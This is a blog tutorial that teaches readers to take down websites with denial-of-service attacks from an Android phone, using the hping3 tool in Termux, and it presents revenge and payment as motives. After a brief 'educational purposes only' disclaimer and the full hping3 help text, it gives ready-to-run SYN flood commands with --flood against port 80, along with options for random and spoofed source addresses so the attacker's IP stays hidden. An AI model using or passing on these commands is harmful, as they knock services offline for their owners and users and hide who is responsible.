In this article, I will explain to you, how you can attack a webserver through Termux. Friends, as you know DDoS attack is the easiest way to take down any website. So this attack is mostly used by the attackers for revenge. From this attack, the attacker gets nothing but aims to complete revenge. This type of attack can be done for money as well. To perform such an attack, the attacker gets huge money in return.
Dos attack is very easy to perform. Even a non-technical person can perform this type of attack. Friends this attack is easy to perform but it is illegal to do so. So in case if the victim identified the attacker then the attacker has to suffer from legal responsibilities. In such cases, attackers might be punished for some money to the victim or also can be sent for imprisonment or both.
Note: This article is for educational purposes only. I do not aim to harm anyone or anyone’s property.
So friends In this article I will guide you ‘ how to perform this DDoS attack on any website. So we will perform this attack using our phone. To attack a webserver/website, we require an android App and that’s name is TERMUX.
Termux is a free application available for android/mac users. You can download Termux directly from Google PlayStore.
Friends if you are a beginner and don’t know about Termux. Please read my another post where I fully explained about Termux.
So friends before moving on I will provide you some info about DDoS Attack-
What is DoS ( Denial-of-service) Attack?
A denial-of-service attack is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting the services of a host connected to the Internet.
The DDoS attack is a malicious attempt to disrupt normal traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic.
What is DDoS ( Denial-of-service) Attack?
TheDDOS stands for Distributed Denial of Service. When an attack is done on a massive scale based on the Dos attack this can be said as DDOS Attack. A DDOS attack is more destructive than a DOS attack. Because DDOS is performed from multiple machines or with the help of botnets. As we know botnets are special programs designed to perform some specific works. So in the same way attackers can use botnets to perform DDOS attacks. In DDOS massive packets are sent to the webserver, so to respond to these packets server goes slow, or sometimes it goes down for a long time. So during that time, an organization can suffer from data loss and revenue loss.
Is it legal to perform a Dos/DDos Attack?
- It is legal if you do DDoS / DoS attack with the permission of your target.
- But if you conduct a DDoS / DOS attack without your victim’s statement, you can be sent to jail or fined according to court rules.
- So be careful while doing such an activity. Because these are all illegal activities unless you get permission from your target.
Here we will use HPING3 Tool to perform dos attack. HPING3 is an inbuilt tool in Kali Linux but we can install it in Termux. You can simply download it by putting the below command in the Termux.
Friends once you have downloaded the Termux and if you didn’t update the Termux app then update its repo files otherwise it will not work correctly. I have posted an article on Termux, What is Termux How to use Termux after installing? Please read this article before proceeding.
Let’s install HPING3 –
$pkg install hping3
To check the usage of HPING3 type the below command
$ hping3 -h
It has a big list of commands to use so in the below methods, we can use this tool –
$ hping3 host [options]
-h --help show this help -v --version show version -c --count packet count -i --interval wait (uX for X microseconds, for example -i u1000) --fast alias for -i u10000 (10 packets for second) --faster alias for -i u1000 (100 packets for second) --flood sent packets as fast as possible. Don't show replies. -n --numeric numeric output -q --quiet quiet -I --interface interface name (otherwise default routing interface) -V --verbose verbose mode -D --debug debugging info -z --bind bind ctrl+z to ttl (default to dst port) -Z --unbind unbind ctrl+z --beep beep for every matching packet received
default mode TCP -0 --rawip RAW IP mode -1 --icmp ICMP mode -2 --udp UDP mode -8 --scan SCAN mode. Example: hping --scan 1-30,70-90 -S www.target.host -9 --listen listen mode
-a --spoof spoof source address --rand-dest random destionation address mode. see the man. --rand-source random source address mode. see the man. -t --ttl ttl (default 64) -N --id id (default random) -W --winid use win* id byte ordering -r --rel relativize id field (to estimate host traffic) -f --frag split packets in more frag. (may pass weak acl) -x --morefrag set more fragments flag -y --dontfrag set don't fragment flag -g --fragoff set the fragment offset -m --mtu set virtual mtu, implies --frag if packet size > mtu -o --tos type of service (default 0x00), try --tos help -G --rroute includes RECORD_ROUTE option and display the route buffer --lsrr loose source routing and record route --ssrr strict source routing and record route -H --ipproto set the IP protocol field, only in RAW IP mode
-C --icmptype icmp type (default echo request) -K --icmpcode icmp code (default 0) --force-icmp send all icmp types (default send only supported types) --icmp-gw set gateway address for ICMP redirect (default 0.0.0.0) --icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp) --icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask) --icmp-help display help for others icmp options
-s --baseport base source port (default random) -p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec -k --keep keep still source port -w --win winsize (default 64) -O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4) -Q --seqnum shows only tcp sequence number -b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you’ll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number -L --setack set TCP ack -F --fin set FIN flag -S --syn set SYN flag -R --rst set RST flag -P --push set PUSH flag -A --ack set ACK flag -U --urg set URG flag -X --xmas set X unused flag (0x40) -Y --ymas set Y unused flag (0x80) --tcpexitcode use last tcp->th_flags as exit code --tcp-mss enable the TCP MSS option with the given value --tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common -d --data data size (default is 0) -E --file data from file -e --sign add 'signature' -j --dump dump packets in hex -J --print dump printable characters -B --safe enable 'safe' protocol -u --end tell you when --file reached EOF and prevent rewind -T --traceroute traceroute mode (implies --bind and --ttl 1) --tr-stop Exit when receive the first not ICMP in traceroute mode --tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop --tr-no-rtt Don't calculate/show RTT information in traceroute mode ARS packet description (new, unstable) --apd-send Send the packet described with APD (see docs/APD.txt)
Some Examples to use hping3 —
Use traceroute mode (–traceroute), be verbose (-V) in ICMP mode (-1) against the target (www.abc.com):
$ hping3 --traceroute -V -1 www.abc.com
using eth0, addr: 192.168.1.15, MTU: 1500 HPING www.example.com (eth0 126.96.36.199): icmp mode set, 28 headers + 0 data bytes hop=1 TTL 0 during transit from ip=192.168.1.1 name=UNKNOWN hop=1 hoprtt=0.3 ms hop=2 TTL 0 during transit from ip=192.168.0.1 name=UNKNOWN hop=2 hoprtt=3.3 ms
For Simple, DOS Attack type this command –
$ hping3 -S --flood -V -p 80 188.8.131.52
hping3: calls hping3 program.
-S: specifies SYN packets.
–flood: shoot at discretion, replies will be ignored (that’s why replies won’t be shown) and packets will be sent fast as possible.
-p 80: port 80, you can replace this number for the service you want to attack.
184.108.40.206: target IP.
Flood using SYN packets against port 80:
$ hping3 abc.com -q -n -d 120 -S -p 80 --flood --rand-source
Abc.com : is the target server/system
-q: brief output
-n: show target IP instead of the host.
-d 120: set packet size
–rand-source: hide IP address.
SYN flood against port 80:
$ hping3 -a <FAKE IP> <target> -S -q -p 80 --faster -c2
$ hping3 -a 220.127.116.11 18.104.22.168 -S -q -p 80 --faster -c
Friends this is all about DDOS attack. How to perform a DDOS Attack using our mobile. Friends, it’s quite simple and easy to perform. So with the help of hping3, we can use this tool for dos/DDOS attacks. So, friends, still if you have any doubts or any queries on this post, do not hesitate to contact me. If you like our post, then share it with your friends. And if you have any suggestions for me, please write to me in the comment box.